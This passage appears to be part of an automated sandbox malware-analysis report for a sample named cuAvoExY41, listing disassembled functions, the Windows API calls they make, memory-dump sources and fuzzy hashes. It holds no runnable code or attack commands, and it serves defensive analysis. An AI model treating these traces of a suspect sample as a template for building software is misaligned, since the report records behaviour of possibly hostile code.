                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 64bfe3accff5c2d40908bb556c801924425e5e7aae85ab5a2ebc4cc7f2592cee
                                                          • Instruction ID: acd39d052f0278844f47ff64a53c1ffb29e9fbf66d9bbcbf8cdc53e4c4b60d7b
                                                          • Opcode Fuzzy Hash: 64bfe3accff5c2d40908bb556c801924425e5e7aae85ab5a2ebc4cc7f2592cee
                                                          • Instruction Fuzzy Hash: 8CF0B436905125F7DB216F21AC19F5E374AAB41770B1E8113B8089B390CB24DD01A2E0
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FD3C3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          • Opcode ID: e111612885b0b2b44794d5d91203a46c1835f22837b8e23373489e1405d98318
                                                          • Instruction ID: 6a75f23d3532bc17606baf47ae45d5d649271cead539e3cf4639f76279e5f181
                                                          • Opcode Fuzzy Hash: e111612885b0b2b44794d5d91203a46c1835f22837b8e23373489e1405d98318
                                                          • Instruction Fuzzy Hash: 1CF0EC336102169FCF124E68EC0499A77DBEF41B747184526FB05E7290DB31EB20E791
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 089a4547bff87c4b6c35f67e9c2ba21be63fbee5e4252215becf66a70357f1bb
                                                          • Instruction ID: c2c9a03d1aa0ab79a92332def3632ef8535558f3275678367fb23e46a30a10fc
                                                          • Opcode Fuzzy Hash: 089a4547bff87c4b6c35f67e9c2ba21be63fbee5e4252215becf66a70357f1bb
                                                          • Instruction Fuzzy Hash: 75E0E532A0621696D67236E59C08F9B774BDB413F0F1D0213AC489B381CF24CC03BAE0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB5AC2
                                                            • Part of subcall function 00FBB505: __EH_prolog.LIBCMT ref: 00FBB50A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: eb0207ef1b844b783b448549bde33a794ac543f2f9a858515deb41b6c69584a1
                                                          • Instruction ID: d678e3a384407638f0fbcc1e4fbf7464c8a419ee1b71fab712382b5646d06113
                                                          • Opcode Fuzzy Hash: eb0207ef1b844b783b448549bde33a794ac543f2f9a858515deb41b6c69584a1
                                                          • Instruction Fuzzy Hash: 06018130410691DAD725EBB8C942BDDFBA49F94304F54448DA45653283CFB81B09F7A2
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00FB95D6,?,?,?,?,?,00FE2641,000000FF), ref: 00FB963B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: d896180a11343f79eccff0cf99fcb19a83f5677d2ad71dacbcda2d93494a365f
                                                          • Instruction ID: 61446e6033ba574dede106ca825045463a321cad10ebd8d327f28ac09c2763a5
                                                          • Opcode Fuzzy Hash: d896180a11343f79eccff0cf99fcb19a83f5677d2ad71dacbcda2d93494a365f
                                                          • Instruction Fuzzy Hash: 26F0E930885B059FDB308A22C848BD277E96B12331F040B1ED1F283AE0D7A0658DAE40
                                                          APIs
                                                            • Part of subcall function 00FBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6C4
                                                            • Part of subcall function 00FBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6F2
                                                            • Part of subcall function 00FBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6FE
                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                          • String ID:
                                                          • API String ID: 1464966427-0
                                                          • Opcode ID: d948073b42243801df73acbe20f2e262b19b0d889b9d05212930bfc625d964ba
                                                          • Instruction ID: 1efe3561a8a57d94b80831ab47a46d12363955553b090edfbfeb70689bf47006
                                                          • Opcode Fuzzy Hash: d948073b42243801df73acbe20f2e262b19b0d889b9d05212930bfc625d964ba
                                                          • Instruction Fuzzy Hash: 7EF08236408790AACB3257B58D04BCB7B906F1A331F088A49F1FD52196D2795198AF23
                                                          APIs
                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00FC0E3D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExecutionStateThread
                                                          • String ID:
                                                          • API String ID: 2211380416-0
                                                          • Opcode ID: 5baa11a15a2a6d55a520d7ff5d8a18a6b9c13c0ad7ef8e63cd98420177c4c25b
                                                          • Instruction ID: eda79b27d192e305b7b99daa07703dcefc3ea30e69485c2f0c4a69bdb8c2abf3
                                                          • Opcode Fuzzy Hash: 5baa11a15a2a6d55a520d7ff5d8a18a6b9c13c0ad7ef8e63cd98420177c4c25b
                                                          • Instruction Fuzzy Hash: 5AD05B11E4109A96DB1137296E5BFFE390A9FD7321F0D006DF1459B293CE5C4C87B661
                                                          APIs
                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00FCA62C
                                                            • Part of subcall function 00FCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FCA3DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                          • String ID:
                                                          • API String ID: 1915507550-0
                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                          • Instruction ID: 3c873bde13c80d0676c8e0ccd2f44340054d437e046afc00e5ce0c4c113b446c
                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                          • Instruction Fuzzy Hash: A0D0A77120020E76DF01AB618E13F7E7595EB00344F008029B842C5141EAB1ED10B552
                                                          APIs
                                                          • DloadProtectSection.DELAYIMP ref: 00FCE5E3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DloadProtectSection
                                                          • String ID:
                                                          • API String ID: 2203082970-0
                                                          • Opcode ID: 0a36dc920505210e57d8c0ca5bf1bc4491eb79983da68f3a67e178d1e90fbee2
                                                          • Instruction ID: 0ea49795844e900cfa8bdfc6c4d88bbec0fbded9ddfee3ec417b45770e6ece1a
                                                          • Opcode Fuzzy Hash: 0a36dc920505210e57d8c0ca5bf1bc4491eb79983da68f3a67e178d1e90fbee2
                                                          • Instruction Fuzzy Hash: 0BD022B04402868BC729EBB89B83F053B54B320B14F88080CF3C4D6088CB7D4080FB01
                                                          APIs
                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FC1B3E), ref: 00FCDD92
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                          • String ID:
                                                          • API String ID: 897784432-0
                                                          • Opcode ID: 3d4256d4d0698d651a7bfe9b51f4780770efcd18f3bd49b102fb9ca47b2ffb7c
                                                          • Instruction ID: 31df27f419cc46a3d2860b4277b4fae85b9441a0c0a7e71642ae63416efba8ae
                                                          • Opcode Fuzzy Hash: 3d4256d4d0698d651a7bfe9b51f4780770efcd18f3bd49b102fb9ca47b2ffb7c
                                                          • Instruction Fuzzy Hash: BFD09E71144301BAD6116B51CE07F1A7AB6BB88B05F004958B284740B1CA779D21EB11
                                                          APIs
                                                          • GetFileType.KERNELBASE(000000FF,00FB97BE), ref: 00FB98C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: 72eec1e16b4ee46d437e515d77878a2563750bb1c78dd7bddf8f2567e4a7dbba
                                                          • Instruction ID: fcb77d6c7a57f81d2447ec8bf11871cd8b4f3bda7814d319000de8facd449612
                                                          • Opcode Fuzzy Hash: 72eec1e16b4ee46d437e515d77878a2563750bb1c78dd7bddf8f2567e4a7dbba
                                                          • Instruction Fuzzy Hash: 50C01234808105858E20472998480D57321AE533757F49694C228894A1C362CC47FE00
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f287b8071a186292247309219228fc7c2dcef4144c77ff1b546384ddaa249fc5
                                                          • Instruction ID: b3218129f4d91fc9249e868ae0e71c8fb17f76ba4d1c7000e62d71f3c815f4cc
                                                          • Opcode Fuzzy Hash: f287b8071a186292247309219228fc7c2dcef4144c77ff1b546384ddaa249fc5
                                                          • Instruction Fuzzy Hash: 56B012D2259142AC300852065F03F37111CD3C2B20334C12EFC05C41C0D844FD053872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d45b9fa17201a65d0e3fee1bca6531f59b7994438e037e25216e7ab1baef32bc
                                                          • Instruction ID: 43053e5a7c96414b8ed2740eec8f5fe7906a6889f5315fb793b66f3104087f1e
                                                          • Opcode Fuzzy Hash: d45b9fa17201a65d0e3fee1bca6531f59b7994438e037e25216e7ab1baef32bc
                                                          • Instruction Fuzzy Hash: 55B012D625D242AC3008514A5F03F37112CE3C0B20334402EF805C40C0D884BD013972
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 2d595bd938cb469e04593f5521cac4af096207dbad5942efd8e9afe587af2ccd
                                                          • Instruction ID: 5a50d90f28c6f68e62041229de988d3212bcbd8d5686c2599bcea97321cc1025
                                                          • Opcode Fuzzy Hash: 2d595bd938cb469e04593f5521cac4af096207dbad5942efd8e9afe587af2ccd
                                                          • Instruction Fuzzy Hash: A3B012D2359282BC304852065F03F37111CD3C1B20334812EFC05C41C0D844BD453872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 698c5580fa4e2c8a3e1ca7c4d6f47e32568d33a385e4088ddca89dd37402a2e2
                                                          • Instruction ID: eb2bb59a7c0abe03951563e0d5fdc65d51081ca7aabaf0a45f8cff4147385e1f
                                                          • Opcode Fuzzy Hash: 698c5580fa4e2c8a3e1ca7c4d6f47e32568d33a385e4088ddca89dd37402a2e2
                                                          • Instruction Fuzzy Hash: 06B012E22590C2BC310491055E03F37124DD2C0B20330C11EF808C50C0D8449C053873
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 82cba1bafccf968818103dae744c5fa77d938efd3feab145f406bc62fc721162
                                                          • Instruction ID: 77ba90718ffbfece44ed9ca26a8a3453e5d726dd31aa1e04e548d19f0486e055
                                                          • Opcode Fuzzy Hash: 82cba1bafccf968818103dae744c5fa77d938efd3feab145f406bc62fc721162
                                                          • Instruction Fuzzy Hash: 90B012F22590C2BC310491055E03F37128DD1C0F20330801EF808C50C0D8489D013473
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
